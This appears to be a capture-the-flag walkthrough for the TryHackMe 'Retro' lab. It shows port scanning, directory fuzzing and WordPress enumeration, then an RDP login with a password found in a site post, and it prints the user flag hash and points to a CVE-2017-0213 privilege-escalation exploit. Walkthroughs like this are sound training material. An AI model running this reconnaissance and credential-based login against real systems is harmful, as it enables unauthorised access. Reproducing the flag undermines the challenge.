https://tryhackme.com/room/retro
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETROWEB
| NetBIOS_Domain_Name: RETROWEB
| NetBIOS_Computer_Name: RETROWEB
| DNS_Domain_Name: RetroWeb
| DNS_Computer_Name: RetroWeb
| Product_Version: 10.0.14393
|_ System_Time: 2022-07-29T04:20:56+00:00
| ssl-cert: Subject: commonName=RetroWeb
| Not valid before: 2022-07-28T04:19:17
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 10.10.234.153 -w /usr/share/wordlists/dirb/common.txt -q -t 200
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 10.10.234.153 -w /usr/share/wordlists/dirb/big.txt -q -t 200
/retro (Status: 301) [Size: 150] [--> <http://10.10.234.153/retro/>]
The big.txt dictionary lead us to /retro
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u 10.10.234.153/retro -w /usr/share/wordlists/dirb/big.txt -q -t 200
/wp-content (Status: 301) [Size: 161] [--> <http://10.10.234.153/retro/wp-content/>]
/wp-admin (Status: 301) [Size: 159] [--> <http://10.10.234.153/retro/wp-admin/>]
/wp-includes (Status: 301) [Size: 162] [--> <http://10.10.234.153/retro/wp-includes/>]
Doing another fuzzing round and knowing that this is a wordpress site
┌──(kali㉿kali)-[~]
└─$ wpscan --url <http://10.10.234.153/retro/>
_______________________________________________________________
__ _______ _____
\\ \\ / / __ \\ / ____|
\\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ ®
\\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\
\\ /\\ / | | ____) | (__| (_| | | | |
\\/ \\/ |_| |_____/ \\___|\\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - <https://automattic.com/>
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: <http://10.10.234.153/retro/> [10.10.234.153]
[+] Started: Fri Jul 29 00:26:04 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Microsoft-IIS/10.0
| - X-Powered-By: PHP/7.1.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: <http://10.10.234.153/retro/xmlrpc.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - <http://codex.wordpress.org/XML-RPC_Pingback_API>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/>
| - <https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/>
| - <https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/>
[+] WordPress readme found: <http://10.10.234.153/retro/readme.html>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: <http://10.10.234.153/retro/wp-cron.php>
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - <https://www.iplocation.net/defend-wordpress-from-ddos>
| - <https://github.com/wpscanteam/wpscan/issues/1299>
[+] WordPress version 5.2.1 identified (Insecure, released on 2019-05-21).
| Found By: Rss Generator (Passive Detection)
| - <http://10.10.234.153/retro/index.php/feed/>, <generator><https://wordpress.org/?v=5.2.1></generator>
| - <http://10.10.234.153/retro/index.php/comments/feed/>, <generator><https://wordpress.org/?v=5.2.1></generator>
[+] WordPress theme in use: 90s-retro
| Location: <http://10.10.234.153/retro/wp-content/themes/90s-retro/>
| Latest Version: 1.4.10 (up to date)
| Last Updated: 2019-04-15T00:00:00.000Z
| Readme: <http://10.10.234.153/retro/wp-content/themes/90s-retro/readme.txt>
| Style URL: <http://10.10.234.153/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1>
| Style Name: 90s Retro
| Style URI: <https://organicthemes.com/retro-theme/>
| Description: Have you ever wished your WordPress blog looked like an old Geocities site from the 90s!? Probably n...
| Author: Organic Themes
| Author URI: <https://organicthemes.com>
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4.10 (80% confidence)
| Found By: Style (Passive Detection)
| - <http://10.10.234.153/retro/wp-content/themes/90s-retro/style.css?ver=5.2.1>, Match: 'Version: 1.4.10'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[i] User(s) Identified:
[+] wade
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - <http://10.10.234.153/retro/index.php/wp-json/wp/v2/users/?per_page=100&page=1>
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Wade
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:23 <======================================================================================================> (137 / 137) 100.00% Time: 00:00:23
[i] No Config Backups Found.
After many trial and we ending up read the posts and found this
Password, maybe? parzival
Since we have the password, without further trying the WordPress, we go RDP into it
xfreerdp /v:10.10.16.193 /u:wade
And the user.txt is on the Desktop
3b99fbdc6d430bfb51c72c651a261927
windows-kernel-exploits/CVE-2017-0213 at master · SecWiki/windows-kernel-exploits